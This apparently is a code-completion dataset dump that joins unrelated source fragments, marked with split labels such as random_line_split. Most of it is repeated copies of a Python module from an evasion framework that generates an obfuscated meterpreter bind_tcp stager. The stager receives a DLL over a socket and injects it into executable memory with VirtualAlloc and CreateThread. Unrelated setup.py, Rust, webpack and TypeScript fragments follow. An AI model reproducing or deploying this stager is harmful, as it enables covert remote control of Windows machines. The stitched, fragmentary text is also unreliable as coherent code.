    :param cli_obj: parsed command-line options; ``ordnance_payload``,
        ``msfvenom`` and ``tool`` attributes select the payload type.
    """
    # required options
    self.description = "pure windows/meterpreter/bind_tcp stager, no shellcode"
    self.rating = "Excellent"
    self.name = "Pure Python Reverse TCP stager"
    self.path = "python/meterpreter/bind_tcp"
    self.cli_opts = cli_obj
    self.payload_source_code = ""
    self.language = "python"
    self.extension = "py"

    if cli_obj.ordnance_payload is not None:
        self.payload_type = cli_obj.ordnance_payload
    elif cli_obj.msfvenom is not None:
        self.payload_type = cli_obj.msfvenom
    elif not cli_obj.tool:
        self.payload_type = ""

    # optional
    # options we require user interaction for- format is {OPTION : [Value, Description]]}
    self.required_options = {
        "COMPILE_TO_EXE": ["Y", "Compile to an executable"],
        "RHOST": ["", "The listen target address"],
        "LPORT": ["4444", "The listen port"],
        "USE_PYHERION": ["N", "Use the pyherion encrypter"]}
def generate(self):
    """Build the pure-python windows/meterpreter/bind_tcp stager source.

    The emitted script binds to RHOST:LPORT, accepts the handler's
    connection, downloads the meterpreter DLL, patches the connected
    socket's file descriptor into it and injects it into memory via
    ctypes. The result is stored in ``self.payload_source_code``.
    (Fix: removed the dataset-dump marker fused to the final line.)
    """
    # randomize all of the variable names used
    shellCodeName = evasion_helpers.randomString()
    socketName = evasion_helpers.randomString()
    clientSocketName = evasion_helpers.randomString()
    getDataMethodName = evasion_helpers.randomString()
    fdBufName = evasion_helpers.randomString()
    rcvStringName = evasion_helpers.randomString()
    rcvCStringName = evasion_helpers.randomString()
    injectMethodName = evasion_helpers.randomString()
    tempShellcodeName = evasion_helpers.randomString()
    shellcodeBufName = evasion_helpers.randomString()
    fpName = evasion_helpers.randomString()
    tempCBuffer = evasion_helpers.randomString()

    payload_code = "import struct, socket, binascii, ctypes, random, time\n"
    # socket and shellcode variables that need to be kept global
    payload_code += "%s, %s = None, None\n" % (shellCodeName, socketName)

    # build the method that creates a socket, connects to the handler,
    # and downloads/patches the meterpreter .dll
    payload_code += "def %s():\n" % (getDataMethodName)
    payload_code += "\ttry:\n"
    payload_code += "\t\tglobal %s\n" % (socketName)
    payload_code += "\t\tglobal %s\n" % (clientSocketName)
    # build the socket and connect to the handler
    payload_code += "\t\t%s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n" % (socketName)
    payload_code += "\t\t%s.bind(('%s', %s))\n" % (socketName, self.required_options["RHOST"][0], str(self.required_options["LPORT"][0]))
    payload_code += "\t\t%s.listen(1)\n" % (socketName)
    payload_code += "\t\t%s,_ = %s.accept()\n" % (clientSocketName, socketName)
    # pack the underlying socket file descriptor into a c structure
    payload_code += "\t\t%s = struct.pack('<i', %s.fileno())\n" % (fdBufName, clientSocketName)
    # unpack the length of the payload, received as a 4 byte array from the handler
    payload_code += "\t\tl = struct.unpack('<i', %s.recv(4))[0]\n" % (clientSocketName)
    payload_code += "\t\t" + rcvStringName + " = b\" \"\n"
    # receive ALL of the payload .dll data
    payload_code += "\t\twhile len(%s) < l: %s += %s.recv(l)\n" % (rcvStringName, rcvStringName, clientSocketName)
    payload_code += "\t\t%s = ctypes.create_string_buffer(%s, len(%s))\n" % (rcvCStringName, rcvStringName, rcvStringName)
    # prepend a little assembly magic to push the socket fd into the edi register
    payload_code += "\t\t%s[0] = binascii.unhexlify('BF')\n" % (rcvCStringName)
    # copy the socket fd in
    payload_code += "\t\tfor i in range(4): %s[i+1] = %s[i]\n" % (rcvCStringName, fdBufName)
    payload_code += "\t\treturn %s\n" % (rcvCStringName)
    payload_code += "\texcept: return None\n"

    # build the method that injects the .dll into memory
    payload_code += "def %s(%s):\n" % (injectMethodName, tempShellcodeName)
    payload_code += "\tif %s != None:\n" % (tempShellcodeName)
    payload_code += "\t\t%s = bytearray(%s)\n" % (shellcodeBufName, tempShellcodeName)
    # allocate enough virtual memory to stuff the .dll in
    payload_code += "\t\t%s = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(%s)),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n" % (fpName, shellcodeBufName)
    # virtual lock to prevent the memory from paging out to disk
    payload_code += "\t\tctypes.windll.kernel32.VirtualLock(ctypes.c_int(%s), ctypes.c_int(len(%s)))\n" % (fpName, shellcodeBufName)
    payload_code += "\t\t%s = (ctypes.c_char * len(%s)).from_buffer(%s)\n" % (tempCBuffer, shellcodeBufName, shellcodeBufName)
    # copy the .dll into the allocated memory
    payload_code += "\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(%s), %s, ctypes.c_int(len(%s)))\n" % (fpName, tempCBuffer, shellcodeBufName)
    # kick the thread off to execute the .dll
    payload_code += "\t\tht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(%s),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n" % (fpName)
    # wait for the .dll execution to finish
    payload_code += "\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))\n"

    # download the stager
    payload_code += "%s = %s()\n" % (shellCodeName, getDataMethodName)
    # inject what we grabbed
    payload_code += "%s(%s)\n" % (injectMethodName, shellCodeName)

    if self.required_options["USE_PYHERION"][0].lower() == "y":
        payload_code = encryption.pyherion(payload_code)

    self.payload_source_code = payload_code
    return
# required options | random_line_split |
bind_tcp.py | """
Custom-written pure python meterpreter/bind_tcp stager
"""
from tools.evasion.evasion_common import evasion_helpers
from tools.evasion.evasion_common import encryption
class PayloadModule:
def __init__(self, cli_obj):
# required options
self.description = "pure windows/meterpreter/bind_tcp stager, no shellcode"
self.rating = "Excellent"
self.name = "Pure Python Reverse TCP stager"
self.path = "python/meterpreter/bind_tcp"
self.cli_opts = cli_obj
self.payload_source_code = ""
self.language = "python"
self.extension = "py"
if cli_obj.ordnance_payload is not None:
self.payload_type = cli_obj.ordnance_payload
elif cli_obj.msfvenom is not None:
self.payload_type = cli_obj.msfvenom
elif not cli_obj.tool:
self.payload_type = ""
# optional
# options we require user interaction for- format is {OPTION : [Value, Description]]}
self.required_options = {
"COMPILE_TO_EXE" : ["Y", "Compile to an executable"],
"RHOST" : ["", "The listen target address"],
"LPORT" : ["4444", "The listen port"],
"USE_PYHERION" : ["N", "Use the pyherion encrypter"]}
def generate(self):
# randomize all of the variable names used
shellCodeName = evasion_helpers.randomString()
socketName = evasion_helpers.randomString()
clientSocketName = evasion_helpers.randomString()
getDataMethodName = evasion_helpers.randomString()
fdBufName = evasion_helpers.randomString()
rcvStringName = evasion_helpers.randomString()
rcvCStringName = evasion_helpers.randomString()
injectMethodName = evasion_helpers.randomString()
tempShellcodeName = evasion_helpers.randomString()
shellcodeBufName = evasion_helpers.randomString()
fpName = evasion_helpers.randomString()
tempCBuffer = evasion_helpers.randomString()
payload_code = "import struct, socket, binascii, ctypes, random, time\n"
# socket and shellcode variables that need to be kept global
payload_code += "%s, %s = None, None\n" % (shellCodeName,socketName)
# build the method that creates a socket, connects to the handler,
# and downloads/patches the meterpreter .dll
payload_code += "def %s():\n" %(getDataMethodName)
payload_code += "\ttry:\n"
payload_code += "\t\tglobal %s\n" %(socketName)
payload_code += "\t\tglobal %s\n" %(clientSocketName)
# build the socket and connect to the handler
payload_code += "\t\t%s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n" %(socketName)
payload_code += "\t\t%s.bind(('%s', %s))\n" %(socketName,self.required_options["RHOST"][0], str(self.required_options["LPORT"][0]))
payload_code += "\t\t%s.listen(1)\n" % (socketName)
payload_code += "\t\t%s,_ = %s.accept()\n" % (clientSocketName, socketName)
# pack the underlying socket file descriptor into a c structure
payload_code += "\t\t%s = struct.pack('<i', %s.fileno())\n" % (fdBufName,clientSocketName)
# unpack the length of the payload, received as a 4 byte array from the handler
payload_code += "\t\tl = struct.unpack('<i', %s.recv(4))[0]\n" %(clientSocketName)
payload_code += "\t\t" + rcvStringName + " = b\" \"\n"
# receive ALL of the payload .dll data
payload_code += "\t\twhile len(%s) < l: %s += %s.recv(l)\n" % (rcvStringName, rcvStringName, clientSocketName)
payload_code += "\t\t%s = ctypes.create_string_buffer(%s, len(%s))\n" % (rcvCStringName,rcvStringName,rcvStringName)
# prepend a little assembly magic to push the socket fd into the edi register
payload_code += "\t\t%s[0] = binascii.unhexlify('BF')\n" %(rcvCStringName)
# copy the socket fd in
payload_code += "\t\tfor i in range(4): %s[i+1] = %s[i]\n" % (rcvCStringName, fdBufName)
payload_code += "\t\treturn %s\n" % (rcvCStringName)
payload_code += "\texcept: return None\n"
# build the method that injects the .dll into memory
payload_code += "def %s(%s):\n" %(injectMethodName,tempShellcodeName)
payload_code += "\tif %s != None:\n" %(tempShellcodeName)
payload_code += "\t\t%s = bytearray(%s)\n" %(shellcodeBufName,tempShellcodeName)
# allocate enough virtual memory to stuff the .dll in
payload_code += "\t\t%s = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(%s)),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n" %(fpName,shellcodeBufName)
# virtual lock to prevent the memory from paging out to disk
payload_code += "\t\tctypes.windll.kernel32.VirtualLock(ctypes.c_int(%s), ctypes.c_int(len(%s)))\n" %(fpName,shellcodeBufName)
payload_code += "\t\t%s = (ctypes.c_char * len(%s)).from_buffer(%s)\n" %(tempCBuffer,shellcodeBufName,shellcodeBufName)
# copy the .dll into the allocated memory
payload_code += "\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(%s), %s, ctypes.c_int(len(%s)))\n" %(fpName,tempCBuffer,shellcodeBufName)
# kick the thread off to execute the .dll
payload_code += "\t\tht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(%s),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n" %(fpName)
# wait for the .dll execution to finish
payload_code += "\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))\n"
# download the stager
payload_code += "%s = %s()\n" %(shellCodeName, getDataMethodName)
# inject what we grabbed
payload_code += "%s(%s)\n" % (injectMethodName,shellCodeName)
if self.required_options["USE_PYHERION"][0].lower() == "y":
|
self.payload_source_code = payload_code
return
| payload_code = encryption.pyherion(payload_code) | conditional_block |
bind_tcp.py | """
Custom-written pure python meterpreter/bind_tcp stager
"""
from tools.evasion.evasion_common import evasion_helpers
from tools.evasion.evasion_common import encryption
class PayloadModule:
def __init__(self, cli_obj):
# required options
|
def generate(self):
# randomize all of the variable names used
shellCodeName = evasion_helpers.randomString()
socketName = evasion_helpers.randomString()
clientSocketName = evasion_helpers.randomString()
getDataMethodName = evasion_helpers.randomString()
fdBufName = evasion_helpers.randomString()
rcvStringName = evasion_helpers.randomString()
rcvCStringName = evasion_helpers.randomString()
injectMethodName = evasion_helpers.randomString()
tempShellcodeName = evasion_helpers.randomString()
shellcodeBufName = evasion_helpers.randomString()
fpName = evasion_helpers.randomString()
tempCBuffer = evasion_helpers.randomString()
payload_code = "import struct, socket, binascii, ctypes, random, time\n"
# socket and shellcode variables that need to be kept global
payload_code += "%s, %s = None, None\n" % (shellCodeName,socketName)
# build the method that creates a socket, connects to the handler,
# and downloads/patches the meterpreter .dll
payload_code += "def %s():\n" %(getDataMethodName)
payload_code += "\ttry:\n"
payload_code += "\t\tglobal %s\n" %(socketName)
payload_code += "\t\tglobal %s\n" %(clientSocketName)
# build the socket and connect to the handler
payload_code += "\t\t%s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n" %(socketName)
payload_code += "\t\t%s.bind(('%s', %s))\n" %(socketName,self.required_options["RHOST"][0], str(self.required_options["LPORT"][0]))
payload_code += "\t\t%s.listen(1)\n" % (socketName)
payload_code += "\t\t%s,_ = %s.accept()\n" % (clientSocketName, socketName)
# pack the underlying socket file descriptor into a c structure
payload_code += "\t\t%s = struct.pack('<i', %s.fileno())\n" % (fdBufName,clientSocketName)
# unpack the length of the payload, received as a 4 byte array from the handler
payload_code += "\t\tl = struct.unpack('<i', %s.recv(4))[0]\n" %(clientSocketName)
payload_code += "\t\t" + rcvStringName + " = b\" \"\n"
# receive ALL of the payload .dll data
payload_code += "\t\twhile len(%s) < l: %s += %s.recv(l)\n" % (rcvStringName, rcvStringName, clientSocketName)
payload_code += "\t\t%s = ctypes.create_string_buffer(%s, len(%s))\n" % (rcvCStringName,rcvStringName,rcvStringName)
# prepend a little assembly magic to push the socket fd into the edi register
payload_code += "\t\t%s[0] = binascii.unhexlify('BF')\n" %(rcvCStringName)
# copy the socket fd in
payload_code += "\t\tfor i in range(4): %s[i+1] = %s[i]\n" % (rcvCStringName, fdBufName)
payload_code += "\t\treturn %s\n" % (rcvCStringName)
payload_code += "\texcept: return None\n"
# build the method that injects the .dll into memory
payload_code += "def %s(%s):\n" %(injectMethodName,tempShellcodeName)
payload_code += "\tif %s != None:\n" %(tempShellcodeName)
payload_code += "\t\t%s = bytearray(%s)\n" %(shellcodeBufName,tempShellcodeName)
# allocate enough virtual memory to stuff the .dll in
payload_code += "\t\t%s = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(%s)),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n" %(fpName,shellcodeBufName)
# virtual lock to prevent the memory from paging out to disk
payload_code += "\t\tctypes.windll.kernel32.VirtualLock(ctypes.c_int(%s), ctypes.c_int(len(%s)))\n" %(fpName,shellcodeBufName)
payload_code += "\t\t%s = (ctypes.c_char * len(%s)).from_buffer(%s)\n" %(tempCBuffer,shellcodeBufName,shellcodeBufName)
# copy the .dll into the allocated memory
payload_code += "\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(%s), %s, ctypes.c_int(len(%s)))\n" %(fpName,tempCBuffer,shellcodeBufName)
# kick the thread off to execute the .dll
payload_code += "\t\tht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(%s),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n" %(fpName)
# wait for the .dll execution to finish
payload_code += "\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))\n"
# download the stager
payload_code += "%s = %s()\n" %(shellCodeName, getDataMethodName)
# inject what we grabbed
payload_code += "%s(%s)\n" % (injectMethodName,shellCodeName)
if self.required_options["USE_PYHERION"][0].lower() == "y":
payload_code = encryption.pyherion(payload_code)
self.payload_source_code = payload_code
return
| self.description = "pure windows/meterpreter/bind_tcp stager, no shellcode"
self.rating = "Excellent"
self.name = "Pure Python Reverse TCP stager"
self.path = "python/meterpreter/bind_tcp"
self.cli_opts = cli_obj
self.payload_source_code = ""
self.language = "python"
self.extension = "py"
if cli_obj.ordnance_payload is not None:
self.payload_type = cli_obj.ordnance_payload
elif cli_obj.msfvenom is not None:
self.payload_type = cli_obj.msfvenom
elif not cli_obj.tool:
self.payload_type = ""
# optional
# options we require user interaction for- format is {OPTION : [Value, Description]]}
self.required_options = {
"COMPILE_TO_EXE" : ["Y", "Compile to an executable"],
"RHOST" : ["", "The listen target address"],
"LPORT" : ["4444", "The listen port"],
"USE_PYHERION" : ["N", "Use the pyherion encrypter"]} | identifier_body |
setup.py | # -*- coding: utf-8 -*-
# Copyright (C) 2013 Michael Hogg
# This file is part of bonemapy - See LICENSE.txt for information on usage and redistribution
import bonemapy
from distutils.core import setup
setup(
name = 'bonemapy',
version = bonemapy.__version__,
description = 'An ABAQUS plug-in to map bone properties from CT scans to 3D finite element bone/implant models',
license = 'MIT license',
keywords = ["ABAQUS", "plug-in","CT","finite","element","bone","properties","python"],
author = 'Michael Hogg',
author_email = '[email protected]',
url = "https://github.com/mhogg/bonemapy",
download_url = "https://github.com/mhogg/bonemapy/releases",
classifiers = [
"Programming Language :: Python",
"Programming Language :: Python :: 2", | "Development Status :: 4 - Beta",
"Environment :: Other Environment",
"Environment :: Plugins",
"Intended Audience :: Healthcare Industry",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Topic :: Scientific/Engineering :: Medical Science Apps.",
"Topic :: Scientific/Engineering :: Visualization",
],
long_description = """
bonemapy is an ABAQUS plug-in that is used to extract bone density, or Hounsfield Unit (HU) values, from CT scans. The bone density can then be used to setup heterogeneous
material properties for a 3D finite element bone/implant model.
The HU values are extracted at the element integration points. Tri-linear interpolation is used to calculate the HU values at the location of the integration points.
bonemapy produces a text file containing the HU values that is formatted so that it can easily be read using ABAQUS user subroutines that are required to apply the bone properties. An
ABAQUS odb file is also created containing a fieldoutput representing HU so that the user can quickly visualise the mapped HU values.
""",
) | "Programming Language :: Python :: 2.6", | random_line_split |
fieldinfo.rs | // GObject Introspection Rust bindings.
// Copyright (C) 2014 Luis Araujo <[email protected]>
// This library is free software; you can redistribute it and/or
// modify it under the terms of the GNU Lesser General Public
// License as published by the Free Software Foundation; either
// version 2.1 of the License, or (at your option) any later version.
// This library is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
// Lesser General Public License for more details.
// You should have received a copy of the GNU Lesser General Public
// License along with this library; if not, write to the Free Software
// Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
extern crate libc;
use fieldinfo::libc::c_int;
use glib_gobject::{GPointer, GBoolean};
use types::{GITypeInfo, GIFieldInfo, GIArgument, GIFieldInfoFlags};
use std::mem::transmute;
#[link(name = "girepository-1.0")]
extern "C" {
fn g_field_info_get_flags(info: *GIFieldInfo) -> c_int;
fn g_field_info_get_size(info: *GIFieldInfo) -> c_int;
fn g_field_info_get_offset(info: *GIFieldInfo) -> c_int;
fn g_field_info_get_type(info: *GIFieldInfo) -> *GITypeInfo;
fn g_field_info_get_field(info: *GIFieldInfo,
mem: GPointer,
value: *GIArgument) -> GBoolean;
fn g_field_info_set_field(info: *GIFieldInfo,
mem: GPointer,
value: *GIArgument) -> GBoolean;
}
/// Obtain the flags for this GIFieldInfo.
pub fn get_flags(info: *GIFieldInfo) -> Option<GIFieldInfoFlags> {
let flag: Option<GIFieldInfoFlags> =
FromPrimitive::from_i32(unsafe { g_field_info_get_flags(info) });
return flag
}
/// Obtain the size in bits of the field member, this is how much space
/// you need to allocate to store the field.
pub fn get_size(info: *GIFieldInfo) -> int |
/// Obtain the offset in bits of the field member, this is relative to the
/// beginning of the struct or union.
pub fn get_offset(info: *GIFieldInfo) -> int {
unsafe { g_field_info_get_offset(info) as int }
}
/// Obtain the type of a field as a GITypeInfo.
pub fn get_type(info: *GIFieldInfo) -> *GITypeInfo {
unsafe { g_field_info_get_type(info) }
}
/// Reads a field identified by a GIFieldInfo from a C structure or union.
pub fn get_field(info: *GIFieldInfo, mem: GPointer, value: *GIArgument) -> GBoolean {
unsafe { g_field_info_get_field(info, mem, value) }
}
/// Writes a field identified by a GIFieldInfo to a C structure or union.
pub fn set_field(info: *GIFieldInfo, mem: GPointer, value: *GIArgument) -> GBoolean {
unsafe { g_field_info_set_field(info, mem, value) }
}
/// Convert GIBaseInfo to GIFieldInfo.
pub fn to_gi_field_info<T>(object: *T) -> *GIFieldInfo {
unsafe { transmute(object) }
}
| {
unsafe { g_field_info_get_size(info) as int }
} | identifier_body |
fieldinfo.rs | // GObject Introspection Rust bindings.
// Copyright (C) 2014 Luis Araujo <[email protected]>
// This library is free software; you can redistribute it and/or
// modify it under the terms of the GNU Lesser General Public
// License as published by the Free Software Foundation; either
// version 2.1 of the License, or (at your option) any later version.
// This library is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
// Lesser General Public License for more details.
// You should have received a copy of the GNU Lesser General Public
// License along with this library; if not, write to the Free Software
// Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
extern crate libc;
use fieldinfo::libc::c_int;
use glib_gobject::{GPointer, GBoolean};
use types::{GITypeInfo, GIFieldInfo, GIArgument, GIFieldInfoFlags};
use std::mem::transmute;
#[link(name = "girepository-1.0")]
extern "C" {
fn g_field_info_get_flags(info: *GIFieldInfo) -> c_int;
fn g_field_info_get_size(info: *GIFieldInfo) -> c_int;
fn g_field_info_get_offset(info: *GIFieldInfo) -> c_int;
fn g_field_info_get_type(info: *GIFieldInfo) -> *GITypeInfo;
fn g_field_info_get_field(info: *GIFieldInfo, | value: *GIArgument) -> GBoolean;
}
/// Obtain the flags for this GIFieldInfo.
pub fn get_flags(info: *GIFieldInfo) -> Option<GIFieldInfoFlags> {
let flag: Option<GIFieldInfoFlags> =
FromPrimitive::from_i32(unsafe { g_field_info_get_flags(info) });
return flag
}
/// Obtain the size in bits of the field member, this is how much space
/// you need to allocate to store the field.
pub fn get_size(info: *GIFieldInfo) -> int {
unsafe { g_field_info_get_size(info) as int }
}
/// Obtain the offset in bits of the field member, this is relative to the
/// beginning of the struct or union.
pub fn get_offset(info: *GIFieldInfo) -> int {
unsafe { g_field_info_get_offset(info) as int }
}
/// Obtain the type of a field as a GITypeInfo.
pub fn get_type(info: *GIFieldInfo) -> *GITypeInfo {
unsafe { g_field_info_get_type(info) }
}
/// Reads a field identified by a GIFieldInfo from a C structure or union.
pub fn get_field(info: *GIFieldInfo, mem: GPointer, value: *GIArgument) -> GBoolean {
unsafe { g_field_info_get_field(info, mem, value) }
}
/// Writes a field identified by a GIFieldInfo to a C structure or union.
pub fn set_field(info: *GIFieldInfo, mem: GPointer, value: *GIArgument) -> GBoolean {
unsafe { g_field_info_set_field(info, mem, value) }
}
/// Convert GIBaseInfo to GIFieldInfo.
pub fn to_gi_field_info<T>(object: *T) -> *GIFieldInfo {
unsafe { transmute(object) }
} | mem: GPointer,
value: *GIArgument) -> GBoolean;
fn g_field_info_set_field(info: *GIFieldInfo,
mem: GPointer, | random_line_split |
fieldinfo.rs | // GObject Introspection Rust bindings.
// Copyright (C) 2014 Luis Araujo <[email protected]>
// This library is free software; you can redistribute it and/or
// modify it under the terms of the GNU Lesser General Public
// License as published by the Free Software Foundation; either
// version 2.1 of the License, or (at your option) any later version.
// This library is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
// Lesser General Public License for more details.
// You should have received a copy of the GNU Lesser General Public
// License along with this library; if not, write to the Free Software
// Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
extern crate libc;
use fieldinfo::libc::c_int;
use glib_gobject::{GPointer, GBoolean};
use types::{GITypeInfo, GIFieldInfo, GIArgument, GIFieldInfoFlags};
use std::mem::transmute;
#[link(name = "girepository-1.0")]
extern "C" {
fn g_field_info_get_flags(info: *GIFieldInfo) -> c_int;
fn g_field_info_get_size(info: *GIFieldInfo) -> c_int;
fn g_field_info_get_offset(info: *GIFieldInfo) -> c_int;
fn g_field_info_get_type(info: *GIFieldInfo) -> *GITypeInfo;
fn g_field_info_get_field(info: *GIFieldInfo,
mem: GPointer,
value: *GIArgument) -> GBoolean;
fn g_field_info_set_field(info: *GIFieldInfo,
mem: GPointer,
value: *GIArgument) -> GBoolean;
}
/// Obtain the flags for this GIFieldInfo.
pub fn get_flags(info: *GIFieldInfo) -> Option<GIFieldInfoFlags> {
let flag: Option<GIFieldInfoFlags> =
FromPrimitive::from_i32(unsafe { g_field_info_get_flags(info) });
return flag
}
/// Obtain the size in bits of the field member, this is how much space
/// you need to allocate to store the field.
pub fn get_size(info: *GIFieldInfo) -> int {
unsafe { g_field_info_get_size(info) as int }
}
/// Obtain the offset in bits of the field member, this is relative to the
/// beginning of the struct or union.
pub fn | (info: *GIFieldInfo) -> int {
unsafe { g_field_info_get_offset(info) as int }
}
/// Obtain the type of a field as a GITypeInfo.
pub fn get_type(info: *GIFieldInfo) -> *GITypeInfo {
unsafe { g_field_info_get_type(info) }
}
/// Reads a field identified by a GIFieldInfo from a C structure or union.
pub fn get_field(info: *GIFieldInfo, mem: GPointer, value: *GIArgument) -> GBoolean {
unsafe { g_field_info_get_field(info, mem, value) }
}
/// Writes a field identified by a GIFieldInfo to a C structure or union.
pub fn set_field(info: *GIFieldInfo, mem: GPointer, value: *GIArgument) -> GBoolean {
unsafe { g_field_info_set_field(info, mem, value) }
}
/// Convert GIBaseInfo to GIFieldInfo.
pub fn to_gi_field_info<T>(object: *T) -> *GIFieldInfo {
unsafe { transmute(object) }
}
| get_offset | identifier_name |
angular2.webpack.config.js | const path = require( 'path' );
const pkg = require( './package.json' );
const webpack = require( 'laxar-infrastructure' ).webpack( {
context: __dirname,
resolve: {
extensions: [ '.js', '.jsx', '.ts', '.tsx' ]
},
module: {
rules: [
{
test: /\.tsx?$/,
exclude: /node_modules\/.*\/spec\//,
loader: 'ts-loader'
},
{
test: /\.jsx?$/,
exclude: path.resolve( __dirname, 'node_modules' ),
loader: 'babel-loader'
},
{
test: /\.spec.js$/, | ]
}
} );
module.exports = [
webpack.library(),
webpack.browserSpec( [ `./spec/${pkg.name}.spec.js` ] )
]; | exclude: path.resolve( __dirname, 'node_modules' ),
loader: 'laxar-mocks/spec-loader'
} | random_line_split |
core.d.ts | export { Format, FormatDefinition, AsyncFormatDefinition, KeywordDefinition, KeywordErrorDefinition, CodeKeywordDefinition, MacroKeywordDefinition, FuncKeywordDefinition, Vocabulary, Schema, SchemaObject, AnySchemaObject, AsyncSchema, AnySchema, ValidateFunction, AsyncValidateFunction, ErrorObject, } from "./types";
export { SchemaCxt, SchemaObjCxt } from "./compile";
export interface Plugin<Opts> {
(ajv: Ajv, options?: Opts): Ajv;
[prop: string]: any;
}
import KeywordCxt from "./compile/context";
export { KeywordCxt };
export { DefinedError } from "./vocabularies/errors";
export { JSONType } from "./compile/rules";
export { JSONSchemaType } from "./types/json-schema";
export { _, str, stringify, nil, Name, Code, CodeGen, CodeGenOptions } from "./compile/codegen";
import type { Schema, AnySchema, AnySchemaObject, SchemaObject, AsyncSchema, Vocabulary, KeywordDefinition, AddedKeywordDefinition, AnyValidateFunction, ValidateFunction, AsyncValidateFunction, ErrorObject, Format, AddedFormat } from "./types";
import type { JSONSchemaType } from "./types/json-schema";
import { ValidationError, MissingRefError } from "./compile/error_classes";
import { ValidationRules } from "./compile/rules";
import { SchemaEnv } from "./compile";
import { Code, ValueScope } from "./compile/codegen";
export declare type Options = CurrentOptions & DeprecatedOptions;
interface CurrentOptions {
strict?: boolean | "log";
strictTypes?: boolean | "log";
strictTuples?: boolean | "log";
allowMatchingProperties?: boolean;
allowUnionTypes?: boolean;
validateFormats?: boolean;
$data?: boolean;
allErrors?: boolean;
verbose?: boolean;
$comment?: true | ((comment: string, schemaPath?: string, rootSchema?: AnySchemaObject) => unknown);
formats?: {
[Name in string]?: Format;
};
keywords?: Vocabulary;
schemas?: AnySchema[] | {
[key: string]: AnySchema;
};
logger?: Logger | false;
loadSchema?: (uri: string) => Promise<AnySchemaObject>;
removeAdditional?: boolean | "all" | "failing";
useDefaults?: boolean | "empty";
coerceTypes?: boolean | "array";
next?: boolean;
unevaluated?: boolean;
dynamicRef?: boolean;
meta?: SchemaObject | boolean;
defaultMeta?: string | AnySchemaObject;
validateSchema?: boolean | "log";
addUsedSchema?: boolean;
inlineRefs?: boolean | number;
passContext?: boolean;
loopRequired?: number;
loopEnum?: number;
ownProperties?: boolean;
multipleOfPrecision?: boolean | number;
messages?: boolean;
code?: CodeOptions;
}
export interface CodeOptions {
es5?: boolean;
lines?: boolean;
optimize?: boolean | number;
formats?: Code;
source?: boolean;
process?: (code: string, schema?: SchemaEnv) => string;
}
interface InstanceCodeOptions extends CodeOptions {
optimize: number;
}
interface DeprecatedOptions {
/** @deprecated */
ignoreKeywordsWithRef?: boolean;
/** @deprecated */
jsPropertySyntax?: boolean;
/** @deprecated */
unicode?: boolean;
}
declare type RequiredInstanceOptions = {
[K in "strict" | "strictTypes" | "strictTuples" | "inlineRefs" | "loopRequired" | "loopEnum" | "meta" | "messages" | "addUsedSchema" | "validateSchema" | "validateFormats"]: NonNullable<Options[K]>;
} & {
code: InstanceCodeOptions;
};
export declare type InstanceOptions = Options & RequiredInstanceOptions;
export interface Logger {
log(...args: unknown[]): unknown;
warn(...args: unknown[]): unknown;
error(...args: unknown[]): unknown;
}
export default class | {
opts: InstanceOptions;
errors?: ErrorObject[] | null;
logger: Logger;
readonly scope: ValueScope;
readonly schemas: {
[key: string]: SchemaEnv | undefined;
};
readonly refs: {
[ref: string]: SchemaEnv | string | undefined;
};
readonly formats: {
[name: string]: AddedFormat | undefined;
};
readonly RULES: ValidationRules;
readonly _compilations: Set<SchemaEnv>;
private readonly _loading;
private readonly _cache;
private readonly _metaOpts;
static ValidationError: typeof ValidationError;
static MissingRefError: typeof MissingRefError;
constructor(opts?: Options);
_addVocabularies(): void;
_addDefaultMetaSchema(): void;
defaultMeta(): string | AnySchemaObject | undefined;
validate(schema: Schema | string, data: unknown): boolean;
validate(schemaKeyRef: AnySchema | string, data: unknown): boolean | Promise<unknown>;
validate<T>(schema: Schema | JSONSchemaType<T> | string, data: unknown): data is T;
validate<T>(schema: AsyncSchema, data: unknown | T): Promise<T>;
validate<T>(schemaKeyRef: AnySchema | string, data: unknown): data is T | Promise<T>;
compile<T = unknown>(schema: Schema | JSONSchemaType<T>, _meta?: boolean): ValidateFunction<T>;
compile<T = unknown>(schema: AsyncSchema, _meta?: boolean): AsyncValidateFunction<T>;
compile<T = unknown>(schema: AnySchema, _meta?: boolean): AnyValidateFunction<T>;
compileAsync<T = unknown>(schema: SchemaObject | JSONSchemaType<T>, _meta?: boolean): Promise<ValidateFunction<T>>;
